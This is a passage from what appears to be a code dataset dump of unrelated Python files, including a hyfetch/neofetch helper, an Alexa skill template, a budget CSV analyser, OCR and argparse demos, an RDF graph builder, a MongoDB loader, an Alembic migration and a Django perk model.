preset.colors[pi].to_ansi() for ai, pi in self.custom_colors.items()}\n for ascii_i, c in color_map.items():\n asc = asc.replace(f'${{c{ascii_i}}}', c)\n\n return asc\n\n\ndef if_file(f: str | Path) -> Path | None:\n \"\"\"\n Return the file if the file exists, or return none. Useful for chaining 'or's\n \"\"\"\n f = Path(f)\n if f.is_file():\n return f\n return None\n\n\ndef get_command_path() -> str:\n \"\"\"\n Get the absolute path of the neofetch command\n\n :return: Command path\n \"\"\"\n cmd_path = pkg_resources.resource_filename(__name__, 'scripts/neowofetch')\n\n # Windows doesn't support symbolic links, but also I can't detect symbolic links... hard-code it here for now.\n if IS_WINDOWS:\n pkg = Path(__file__).parent\n pth = (shutil.which(\"neowofetch\") or\n if_file(cmd_path) or\n if_file(pkg / 'scripts/neowofetch') or\n if_file(pkg.parent / 'neofetch') or\n if_file(Path(cmd_path).parent.parent.parent / 'neofetch'))\n\n if not pth:\n printc(\"&cError: Neofetch script cannot be found\")\n exit(127)\n\n return str(pth)\n\n return cmd_path\n\n\ndef ensure_git_bash() -> Path:\n \"\"\"\n Ensure git bash installation for windows\n\n :returns git bash path\n \"\"\"\n if IS_WINDOWS:\n # Find installation in default path\n def_path = Path(r'C:\\Program Files\\Git\\bin\\bash.exe')\n if def_path.is_file():\n return def_path\n\n # Detect third-party git.exe in path\n git_exe = shutil.which(\"bash\") or shutil.which(\"git.exe\") or shutil.which(\"git\")\n if git_exe is not None:\n pth = Path(git_exe).parent\n if (pth / r'bash.exe').is_file():\n return pth / r'bash.exe'\n elif (pth / r'bin\\bash.exe').is_file():\n return pth / r'bin\\bash.exe'\n\n # Find installation in PATH (C:\\Program Files\\Git\\cmd should be in path)\n pth = (os.environ.get('PATH') or '').lower().split(';')\n pth = [p for p in pth if p.endswith(r'\\git\\cmd')]\n if pth:\n return Path(pth[0]).parent / r'bin\\bash.exe'\n\n # Previously downloaded portable installation\n path = Path(__file__).parent / 'min_git'\n pkg_path = path / 'package.zip'\n if path.is_dir():\n return path / r'bin\\bash.exe'\n\n # No installation found, download a portable installation\n print('Git installation not found. Git is required to use HyFetch/neofetch on Windows')\n if literal_input('Would you like to install a minimal package for Git? (if no is selected colors almost certainly won\\'t work)', ['yes', 'no'], 'yes', False) == 'yes':\n print('Downloading a minimal portable package for Git...')\n from urllib.request import urlretrieve\n urlretrieve(MINGIT_URL, pkg_path)\n print('Download finished! Extracting...')\n with zipfile.ZipFile(pkg_path, 'r') as zip_ref:\n zip_ref.extractall(path)\n print('Done!')\n return path / r'bin\\bash.exe'\n else:\n sys.exit()\n\n\ndef check_windows_cmd():\n \"\"\"\n Check if this script is running under cmd.exe. If so, launch an external window with git bash\n since cmd doesn't support RGB colors.\n \"\"\"\n if IS_WINDOWS:\n import psutil\n # TODO: This line does not correctly identify cmd prompts...\n if psutil.Process(os.getppid()).name().lower().strip() == 'cmd.exe':\n print(\"cmd.exe doesn't support RGB colors, restarting in MinTTY...\")\n cmd = f'\"{ensure_git_bash().parent.parent / \"usr/bin/mintty.exe\"}\" -s 110,40 -e python -m hyfetch --ask-exit'\n os.system(cmd)\n sys.exit(0)\n\n\ndef run_neofetch_cmd(args: str, pipe: bool = False) -> str | None:\n \"\"\"\n Run neofetch command\n \"\"\"\n if platform.system() != 'Windows':\n full_cmd = ['/usr/bin/env', 'bash', get_command_path(), *shlex.split(args)]\n\n else:\n cmd = get_command_path().replace(\"\\\\\", \"/\").replace(\"C:/\", \"/c/\")\n args = args.replace('\\\\', '/').replace('C:/', '/c/')\n\n full_cmd = [ensure_git_bash(), '-c', f\"'{cmd}' {args}\"]\n # print(full_cmd)\n\n if pipe:\n return check_output(full_cmd).decode().strip()\n else:\n subprocess.run(full_cmd)\n\n\ndef get_distro_ascii(distro: str | None = None) -> str:\n \"\"\"\n Get the distro ascii of the current distro. Or if distro is specified, get the specific distro's\n ascii art instead.\n\n :return: Distro ascii\n \"\"\"\n if not distro and GLOBAL_CFG.override_distro:\n distro = GLOBAL_CFG.override_distro\n if GLOBAL_CFG.debug:\n print(distro)\n print(GLOBAL_CFG)\n\n # Try new pure-python detection method\n det = distro_detector.detect(distro or get_distro_name())\n if det is not None:\n return normalize_ascii(det.ascii)\n\n if GLOBAL_CFG.debug:\n printc(f\"&cError: Cannot find distro {distro}\")\n\n # Old detection method that calls neofetch\n cmd = 'print_ascii'\n if distro:\n cmd += f' --ascii_distro {distro}'\n\n asc = run_neofetch_cmd(cmd, True)\n\n # Unescape backslashes here because backslashes are escaped in neofetch for printf\n asc = asc.replace('\\\\\\\\', '\\\\')\n\n return normalize_ascii(asc)\n\n\ndef get_distro_name():\n return run_neofetch_cmd('ascii_distro_name', True)\n\n\ndef run(asc: str, backend: BackendLiteral, args: str = ''):\n if backend == \"neofetch\":\n return run_neofetch(asc, args)\n if backend == \"fastfetch\":\n return run_fastfetch(asc, args)\n if backend == \"fastfetch-old\":\n return run_fastfetch(asc, args, legacy=True)\n if backend == \"qwqfetch\":\n return run_qwqfetch(asc, args)\n\n\ndef run_qwqfetch(asc: str, args: str = ''):\n \"\"\"\n Run neofetch with colors\n\n :param preset: Color palette\n :param alignment: Color alignment settings\n \"\"\"\n asc = asc.replace('\\\\', '\\\\\\\\')\n\n # call qwqfetch to print string\n try:\n import qwqfetch\n # distro_detector only return a bash variable\n # so we use qwqfetch builtin distro detector\n print(qwqfetch.get_ascres(asc)) \n except ImportError as e: # module not found etc\n print(\"qwqfetch is not installed. Install it by executing:\") # use print to output hint directly\n print(\"pip install git+https://github.com/nexplorer-3e/qwqfetch\") # TODO: public repo\n raise e\n\ndef run_neofetch(asc: str, args: str = ''):\n \"\"\"\n Run neofetch with colors\n\n :param asc: Ascii art\n :param args: Additional arguments to pass to neofetch\n \"\"\"\n # Escape backslashes here because backslashes are escaped in neofetch for printf\n asc = asc.replace('\\\\', '\\\\\\\\')\n\n # Write temp file\n with TemporaryDirectory() as tmp_dir:\n tmp_dir = Path(tmp_dir)\n path = tmp_dir / 'ascii.txt'\n path.write_text(asc)\n\n # Call neofetch with the temp file\n if args:\n args = ' ' + args\n run_neofetch_cmd(f'--ascii --source {path.absolute()} --ascii-colors' + args)\n\n\ndef run_fastfetch(asc: str, args: str = '', legacy: bool = False):\n \"\"\"\n Run neofetch with colors\n\n :param asc: Ascii art\n :param args: Additional arguments to pass to fastfetch\n :param legacy: Set true when using fastfetch < 1.8.0\n \"\"\"\n # Write temp file\n with TemporaryDirectory() as tmp_dir:\n tmp_dir = Path(tmp_dir)\n path = tmp_dir / 'ascii.txt'\n path.write_text(asc)\n\n # Call fastfetch with the temp file\n proc = subprocess.run(['fastfetch', '--raw' if legacy else '--file-raw', path.absolute(), *shlex.split(args)])\n if proc.returncode == 144:\n printc(\"&6Error code 144 detected: Please upgrade fastfetch to >=1.8.0 or use the 'fastfetch-old' backend\")\n\n\ndef get_fore_back(distro: str | None = None) -> tuple[int, int] | None:\n \"\"\"\n Get recommended foreground-background configuration for distro, or None if the distro ascii is\n not suitable for fore-back configuration.\n\n :return:\n \"\"\"\n if not distro and GLOBAL_CFG.override_distro:\n distro = GLOBAL_CFG.override_distro\n if not distro:\n distro = get_distro_name().lower()\n distro = distro.lower().replace(' ', '-')\n for k, v in fore_back.items():\n if distro.startswith(k.lower()):\n return v\n return None\n\n\n# Foreground-background recommendation\nfore_back = {\n 'fedora': (2, 1),\n 'kubuntu': (2, 1),\n 'lubuntu': (2, 1),\n 'xubuntu': (2, 1),\n 'ubuntu-cinnamon': (2, 1),\n 'ubuntu-kylin': (2, 1),\n 'ubuntu-mate': (2, 1),\n 'ubuntu-studio': (2, 1),\n 'ubuntu-sway': (2, 1),\n}\n\n","sub_path":"hyfetch/neofetch_util.py","file_name":"neofetch_util.py","file_ext":"py","file_size_in_byte":13618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"543958548","text":"# -*- coding: utf-8 -*-\n\n# This sample demonstrates handling intents from an Alexa skill using the Alexa Skills Kit SDK for Python.\n# Please visit https://alexa.design/cookbook for additional examples on implementing slots, dialog management,\n# session persistence, api calls, and more.\n# This sample is built using the handler classes approach in skill builder.\nimport logging\nimport ask_sdk_core.utils as ask_utils\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler\nfrom ask_sdk_core.dispatch_components import AbstractExceptionHandler\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Skill Launch.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"This is the opening remark when your app is called\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass exampleHandler(AbstractRequestHandler):\n \"\"\"Handler for example Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"exampleIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"This is an example of a custom intent. Your intent name should match the intent name listed on line 44, which is exampleIntent\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Help Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"verbiage for help\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\nclass HomeIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Home Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.NavigateHomeIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"verbiage for Home\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"final message when user leaves\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Session End.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n # Any cleanup logic goes here.\n\n return handler_input.response_builder.response\n\n\nclass IntentReflectorHandler(AbstractRequestHandler):\n \"\"\"The intent reflector is used for interaction model testing and debugging.\n It will simply repeat the intent the user said. You can create custom handlers\n for your intents by defining them above, then also adding them to the request\n handler chain below.\n \"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"IntentRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n intent_name = ask_utils.get_intent_name(handler_input)\n speak_output = \"You just triggered \" + intent_name + \".\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speak_output = \"Sorry, I had trouble doing what you asked. Please try again.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors youve\n# defined are included below. The order matters - theyre processed top to bottom.\n\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(exampleHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(HomeIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\nsb.add_request_handler(IntentReflectorHandler()) # make sure IntentReflectorHandler is last so it doesn't override your custom intent handlers\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nlambda_handler = sb.lambda_handler()\n","sub_path":"simple-phtyon.py","file_name":"simple-phtyon.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"8226868","text":"# Import modules\nimport csv\nimport os\n\n# Set path\npy_bank_data = os.path.join(\"../PyBank\", \"budget_data.csv\")\n\n# Lists for storing data\nprofit = []\nmonthly_changes = []\ndate = []\n\n# Create variables\nmonth_count = 0\ntotal_profit = 0\ntotal_change_profit = 0\nintital_profit = 0\n\n# Open CSV\nwith open(py_bank_data, newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n csv_header = next(csvreader)\n\n for row in csvreader:\n # Append lists while going through the data\n month_count = month_count + 1\n date.append(row[0])\n profit.append(row[1])\n \n # Adding new profit to previous total profit\n total_profit = total_profit + int(row[1])\n final_profit = int(row[1])\n \n # Find the change in profit per month\n monthly_changes_profits = final_profit - intital_profit\n monthly_changes.append(monthly_changes_profits)\n \n # Change final profit to inital profit for next row calculation\n initial_profit = final_profit\n\n # Adding all changing profits for average\n total_change_profit = total_change_profit + monthly_changes_profits\n \n\n # Average change over the given period\n average_change_profits = (total_change_profit/month_count)\n\n # Find the largest increase and decrease in profit per month \n greatest_increase_profits = max(monthly_changes)\n greatest_decrease_profits = min(monthly_changes)\n\n increase_date = date[monthly_changes.index(greatest_increase_profits)]\n decrease_date = date[monthly_changes.index(greatest_decrease_profits)]\n \n # Print output in GitBash\n print(\"Financial Analysis\")\n print(\"----------------------------------------------------------\")\n print(\"Total Months: \" + str(month_count))\n print(\"Total Profits: \" + \"$\" + str(total_profit))\n print(\"Average Change: \" + \"$\" + str(int(average_change_profits)))\n print(\"Greatest Increase in Profits: \" + str(increase_date) + \" ($\" + str(greatest_increase_profits) + \")\")\n print(\"Greatest Decrease in Profits: \" + str(decrease_date) + \" ($\" + str(greatest_decrease_profits)+ \")\")\n print(\"----------------------------------------------------------\")\n \n # Send to txt file \n with open(\"bank_data_output.txt\", \"w\") as text:\n text.write(\"Financial Analysis\" + \"\\n\")\n text.write(\"----------------------------------------------------------\\n\")\n text.write(\"Total Months: \" + str(month_count) + \"\\n\")\n text.write(\"Total Profits: \" + \"$\" + str(total_profit) + \"\\n\")\n text.write(\"Average Change: \" + \"$\" + str(int(average_change_profits)) + \"\\n\")\n text.write(\"Greatest Increase in Profits: \" + str(increase_date) + \" ($\" + str(greatest_increase_profits) + \")\" + \"\\n\")\n text.write(\"Greatest Decrease in Profits: \" + str(decrease_date) + \" ($\" + str(greatest_decrease_profits)+ \")\" + \"\\n\")\n text.write(\"----------------------------------------------------------\\n\")","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"241287994","text":"import pyocr\nimport pyocr.builders\nimport cv2\nimport sys\nfrom PIL import Image\n\ndef get_word_box(src_file_path):\n tools = pyocr.get_available_tools()\n if len( tools ) == 0:\n print(\"No OCR tool found\")\n sys.exeit(1)\n tool = tools[0]\n res = tool.image_to_string(Image.open(src_file_path),lang=\"jpn\",builder=pyocr.builders.WordBoxBuilder(tesseract_layout=1))\n #res = tool.image_to_string(Image.open(src_file_path),lang=\"jpn\",builder=pyocr.builders.TextBuilder(tesseract_layout=6))\n #res = tool.image_to_string(Image.open(src_file_path),lang=\"jpn\",builder=pyocr.builders.BaseBuilder())\n print( res )\n return res\n\nif __name__ == \"__main__\":\n src_file_path = \"../image/fe/h21a/h21a03.png\"\n res = get_word_box(src_file_path)\n out = cv2.imread(src_file_path)\n for d in res:\n print( d.content )\n print( d.position )\n cv2.rectangle(out,d.position[0],d.position[1],(0,0,255),2)\n\n cv2.imshow('image',out)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"lib/ocr_lib/word_box_mj.py","file_name":"word_box_mj.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220030752","text":"import argparse #1. インポート\r\n\r\ndef read_args():\r\n parser = argparse.ArgumentParser() # 2. perserという引数を納める箱を作る\r\n\r\n #3. どんな引数を受け取るかの設定(1行=1つの引数)\r\n parser.add_argument('--list') #一番シンプルな形\r\n\r\n parser.add_argument('--in_dir', required=True) #絶対指定してね\r\n\r\n parser.add_argument('--mode', choices=['train', 'test', 'cont', 'seq'], required=True) #リストのどれかしか受け付けない\r\n\r\n parser.add_argument('--chtbl', default='etc/ch_merge.dat') #指定しなくても勝手にデフォルト値が入る\r\n\r\n parser.add_argument('--filter', action='store_true') #引数無しでオプションを付けたらTrueを返す\r\n\r\n parser.add_argument('--rottbl', default='etc/ch_rot.dat', help='rotation table') #helpも設定できる、-hか--helpで出力\r\n \r\n parser.add_argument('--overlap', type=int, default=0) #読み込み時の型(フォーマット)を指定\r\n\r\n tp1 = lambda x:list(map(str, x.split('-'))) #型は自分でも作れる\r\n parser.add_argument('--term', type=tp1, default=['20210910', '20210911'], help='format: yymmdd-yymmdd term for conversion')\r\n\r\n args = parser.parse_args() # 4.ここまでで設定した通りに引数を受け取る\r\n\r\n #cf. https://qiita.com/kzkadc/items/e4fc7bc9c003de1eb6d0\r\n\r\n return args\r\n\r\ndef main(args):\r\n print(args)\r\n #print(args.list) #指定した引数を取り出したい場合\r\n\r\n #args.add = 'hoge' #後から追加もできる\r\n #print(args)\r\n\r\n #args.list = 'hoge2.txt' #更新もできる\r\n #print(args.list)\r\n\r\nif __name__ == '__main__':\r\n args = read_args()\r\n main(args)","sub_path":"try_argparse.py","file_name":"try_argparse.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"216795714","text":"from rdflib import URIRef, BNode, Literal\nfrom rdflib.namespace import RDF, FOAF \nimport rdflib\nfrom rdflib import Graph\nimport pprint\n\nimport os,glob\n# os.chdir(\"/home/z003z47y/Projects/Government/ASKE/2019/092219_output/\")\n# for file in glob.glob(\"*.txt\"):\n# print(file)\nimage2graphs = []\noutputList = set()\nontology = \"/home/z003z47y/git/DCC/src/ontology/DeepSciKG.nt\"\ndestinationfolder = \"/home/z003z47y/git/DCC/src/ontology/rdf/image2graph/\"\nfor root, dirs, files in os.walk(\"/home/z003z47y/Projects/Government/ASKE/2019/092219_output/\"):\n for file in files:\n if file.endswith('.txt'):\n # print(os.path.join(root, file))\n image2graphs.append(os.path.join(root, file))\n\n\nconsolidatedGraph = Graph() \nconsolidatedGraph.parse(ontology,format=\"n3\")\n\ndef createPredicateSet(inputfile):\n with open(inputfile,encoding=\"ISO-8859-1\") as f:\n lines = f.readlines()\n predicateLines = [x.strip() for x in lines]\n for line in predicateLines:\n triple = line.split(\" \")\n subject = triple[0]\n predicate = triple[1]\n if(triple[2] is None):\n obj = \"\"\n else:\n obj = triple[2]\n # obj = triple[2]\n # print(\"obj is \" + obj)\n if(predicate==\"isType\"):\n outputList.add(obj)\n print(outputList)\n\n\n \n# for file in image2graphs:\n# print(file + \"\\n\")\n# createPredicateSet(file)\n# print(outputList)\n# print(len(outputList))\ndef createimage2graph(inputfile,ontology,destinationfolder):\n\n g = Graph()\n g.parse(ontology,format=\"n3\")\n # len(g)\n\n block_dict = {\n \"Figure\":\"Figure\",\n \"conv\": \"ConvBlock\",\n \"deconv\":\"DeconvBlock\",\n \"dense\":\"DenseBlock\",\n \"flatten\":\"FlattenBlock\",\n \"dropout\":\"DropoutBlock\",\n \"pooling\":\"PoolingBlock\",\n \"unpooling\":\"UnpoolingBlock\",\n \"concat\":\"ConcatBlock\",\n \"rnn\":\"RnnBlock\",\n \"rnnseq\": \"RnnSeqBlock\",\n \"lstm\":\"LSTMBlock\",\n \"lstmseq\":\"LSTMSeqBlock\",\n \"norm\":\"NormBlock\",\n \"embed\":\"EmbedBlock\",\n \"activation\":\"ActivationBlock\",\n \"loss\":\"LossBlock\",\n \"output\":\"OutputBlock\",\n \"input\":\"InputBlock\"\n }\n\n# Namespaces\n dcc_namespace = \"https://github.com/deepcurator/DCC/\"\n\n # Classes\n Figure = URIRef(dcc_namespace + \"Figure\")\n # ActivationBlock = URIRef(dcc_namespace + \"ActivationBlock\")\n # EmbedBlock = URIRef(dcc_namespace + \"EmbedBlock\")\n # NormBlock = URIRef(dcc_namespace + \"NormBlock\")\n # LSTMSeqBlock = URIRef(dcc_namespace + \"LSTMSeqBlock\")\n # LSTMBlock = URIRef(dcc_namespace + \"LSTMBlock\")\n # RNNSeqBlock = URIRef(dcc_namespace + \"RNNSeqBlock\")\n # RNNBlock = URIRef(dcc_namespace + \"RNNBlock\")\n # ConcatBlock = URIRef(dcc_namespace + \"ConcatBlock\")\n # UnpoolingBlock = URIRef(dcc_namespace + \"UnpoolingBlock\")\n # PoolingBlock = URIRef(dcc_namespace + \"PoolingBlock\")\n # DropoutBlock = URIRef(dcc_namespace + \"DropoutBlock\")\n # FlattenBlock = URIRef(dcc_namespace + \"FlattenBlock\")\n # DenseBlock = URIRef(dcc_namespace + \"DenseBlock\")\n # DeconvBlock = URIRef(dcc_namespace + \"DeconvBlock\")\n # ConvBlock = URIRef(dcc_namespace + \"ConvBlock\")\n # LossBlock = URIRef(dcc_namespace + \"LossBlock\")\n # Properties\n partOf = URIRef(dcc_namespace + \"partOf\")\n followedBy = URIRef(dcc_namespace + \"followedBy\")\n\n # Open the image2graph\n\n with open(inputfile,encoding=\"ISO-8859-1\") as f:\n lines = f.readlines()\n lines = [x.strip() for x in lines]\n\n # Each line in the image2graph is a triple\n # Split the triple into s,p,o\n # Create the URIRefs for RDF based on the ontology\n # URIRefs require the namespace and the class term from ontology\n\n for line in lines:\n triple = line.split(\" \")\n subject = triple[0]\n predicate = triple[1]\n obj = triple[2]\n # print(line + \"\\n\")\n if(predicate == \"partOf\"):\n ## Subject is a component\n ## Create a unique URI for that\n filename = inputfile.split('/')[-1]\n filename = filename.split('.txt')[0]\n subject = URIRef(dcc_namespace + filename[4:] + \"_\" + subject[1:])\n obj = URIRef(dcc_namespace + obj)\n g.add((subject,partOf,obj))\n consolidatedGraph.add((subject,partOf,obj))\n elif(predicate == \"isA\"):\n subject = URIRef(dcc_namespace + subject)\n g.add((subject,RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n consolidatedGraph.add((subject,RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n elif(predicate == \"isType\"):\n filename = inputfile.split('/')[-1]\n filename = filename.split('.txt')[0]\n subject = URIRef(dcc_namespace + filename[4:] + \"_\" + subject[1:])\n g.add((subject, RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n consolidatedGraph.add((subject, RDF.type, URIRef(dcc_namespace + block_dict.get(obj))))\n\n # All triples are created for the current file\n # Serialize the rdf files to their right folder\n\n filename = inputfile.split('/')[-1]\n filename = filename.split('.txt')[0]\n print(destinationfolder + filename[4:])\n destinationfile = destinationfolder + filename[4:] + \".ttl\"\n print(\"Saving rdf graph \" + destinationfile + \"\\n\")\n g.serialize(destination=destinationfile,format='turtle')\n\n# print(image2graphs)\nfor file in image2graphs:\n filename = file.split('/')[-1]\n filename = filename.split('.txt')[0]\n print(\"Creating RDF graph for \" + filename[4:])\n createimage2graph(file,ontology,destinationfolder)\n\nconsolidatedGraph.serialize(destination=\"image2graph.ttl\",format='turtle')","sub_path":"src/ontology/image2rdf.py","file_name":"image2rdf.py","file_ext":"py","file_size_in_byte":5720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255842995","text":"from pymongo import MongoClient\nimport os\nimport json\n\nfrom settings import COMPANIES_JSON_PATH, PEOPLE_JSON_PATH, DB_NAME, HOST_NAME, PORT_NAME, \\\n COMPANIES_COLLECTION_NAME, PEOPLE_COLLECTION_NAME, \\\n FRUIT_LIST, VEG_LIST, \\\n PEOPLE_FAVORITE_FOOD_COLNAME, PEOPLE_FAVORITE_FRUIT_COLNAME, PEOPLE_FAVORITE_VEGETABLE_COLNAME\n\n\n\ndef get_fruits(foods):\n return [food for food in foods if food in FRUIT_LIST]\n\n\ndef get_veg(foods):\n return [food for food in foods if food in VEG_LIST]\n\n\ndef init_collection(db, collection_name, collection_json_path):\n if db[collection_name]:\n db[collection_name].drop()\n\n with open(collection_json_path, 'r') as f:\n collection_json = json.load(f)\n\n collection = db[collection_name]\n print(\"Loading data into the mongodb.collection: {}.{}\".format(db.name, collection_name))\n collection.insert_many(collection_json)\n\n\ndef process_food(collection_people):\n for person in collection_people.find():\n fruits = get_fruits(person[PEOPLE_FAVORITE_FOOD_COLNAME])\n vegs = get_veg(person[PEOPLE_FAVORITE_FOOD_COLNAME])\n collection_people.update_one({\"_id\": person[\"_id\"]}, {\"$set\": {PEOPLE_FAVORITE_FRUIT_COLNAME: fruits}})\n collection_people.update_one({\"_id\": person[\"_id\"]}, {\"$set\": {PEOPLE_FAVORITE_VEGETABLE_COLNAME: vegs}})\n\n\ndef load_data_to_mongo(db_name=DB_NAME,\n host_name=HOST_NAME,\n port_name=PORT_NAME,\n companies_collection_name=COMPANIES_COLLECTION_NAME,\n companies_json_path=COMPANIES_JSON_PATH,\n people_collection_name=PEOPLE_COLLECTION_NAME,\n people_json_path=PEOPLE_JSON_PATH):\n\n client = MongoClient(host_name, port_name)\n db = client[db_name]\n\n init_collection(db, companies_collection_name, companies_json_path)\n init_collection(db, people_collection_name, people_json_path)\n\n process_food(db[people_collection_name])","sub_path":"setup/mongo_init.py","file_name":"mongo_init.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"362346061","text":"\"\"\"add server\n\nRevision ID: 4cb042fe9e64\nRevises: 3f93484822f7\nCreate Date: 2015-12-08 15:02:20.891740\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '4cb042fe9e64'\ndown_revision = '3f93484822f7'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('servers',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('ip', sa.String(length=50), nullable=False),\n sa.Column('ssh_port', sa.Integer(), nullable=False),\n sa.Column('servername', sa.String(length=50), nullable=True),\n sa.Column('is_open', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('ip')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('servers')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/4cb042fe9e64_add_server.py","file_name":"4cb042fe9e64_add_server.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220547458","text":"#listing_id,business_name,listing_description,owner_id\n#listing_location,listing_longitude,listing_latitude,category_id\n#host_highlight,additional_info,created_date,modified_date\n#featured,is_active\n\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom .address import Address\nfrom .listing import Listing\nfrom .business_connection import BConnection\n\n\nclass Perk(models.Model):\n owner = models.ForeignKey(to=User)\n from_listing = models.ForeignKey(to=Listing) # perk offered from\n ally = models.ForeignKey(to=Listing,null=True, blank=True, related_name='+') #perk offered to\n perk_name = models.CharField(max_length=100)\n perk_description = models.CharField(max_length=200)\n perk_coupon_code = models.CharField(max_length=7)\n is_active = models.BooleanField(default=True)\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n perk_image_url = models.CharField(max_length=200)\n additional_info = models.CharField(max_length=500)\n\n","sub_path":"logaloud/mobilebackend/models/perk.py","file_name":"perk.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"651309784","text":"# -*- coding: utf-8 -*-#\n'''\n# Name: mnistTest\n# Description: \n# Author: super\n# Date: 2019-08-06\n'''\n\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import SGDClassifier\n\ndef get_mnist_data():\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n X_train = X_train.reshape(X_train.shape[0], -1) / 255\n X_test = X_test.reshape(X_test.shape[0], -1) / 255\n return (X_train, y_train), (X_test, y_test)\n\ndef plt_mnist():\n some_digit = X_train[3970]\n print(y_train[3970])\n plt.imshow(X_train[3970], interpolation=\"nearest\")\n plt.axis(\"off\")\n plt.show()\n\nif __name__ 